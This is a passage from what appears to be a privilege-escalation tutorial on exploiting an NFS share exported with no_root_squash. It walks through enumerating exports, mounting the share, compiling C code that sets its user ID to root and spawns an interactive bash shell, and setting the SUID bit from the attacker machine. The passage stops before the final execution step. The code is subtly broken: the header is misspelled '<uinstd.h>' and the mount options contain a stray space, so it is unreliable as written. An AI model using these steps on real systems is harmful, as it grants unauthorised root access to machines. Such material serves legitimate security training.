Introduction

The compromised machine may be configured to allow certain directories to be mounted by other machines. You can enumerate such directories by running the following command on the victim machine:

cat /etc/exports

You can additionally verify this from your attacker machine by running:

showmount -e <victim IP>

If there is a mountable directory which is configured as no_root_squash, as is the case here, then it can be used for privilege escalation.

We begin by mounting the target directory from the victim to a directory on our machine:

sudo mount -o rw, vers=3 <victim IP>:/tmp /tmp/root_squash

Now, if no_root_sqaush is configured for the mountable directory, then the root user on the attacker machine will get mirrored on the victim machine. In essence, any command run as root on the attacker machine, will also be executed as root on the victim! This can allow us to create a malicious binary in the mounted directory and set its SUID bit from the attacker machine. This action will be mirrored by the victim and we will essentially have an SUID binary on the target which is all under our control.

Let's write a simple malicious C executable:

#include <uinstd.h>
#include <stdlib.h>

int main()
{
	setuid(0); // Set user ID to root
	setgid(0); // Set group ID to root
	system("/bin/bash -i"); // Execute bash now with elevated privileges

	return 0;
}

It doesn't matter if you create it on the target or the attacker machine, but you must compile it on the target machine in order to avoid library version mismatches:

gcc -o nfs_exploit nfs_exploit.c

Next, you want to change the ownership of the compiled binary to root on the attacker machine. Afterwards, you want to set the SUID bit on the binary, once again, from the attacker machine:

sudo chown root:root nfs_exploit
sudo chmod +s nfs_exploit

Finally, execute the malicious binary on the target: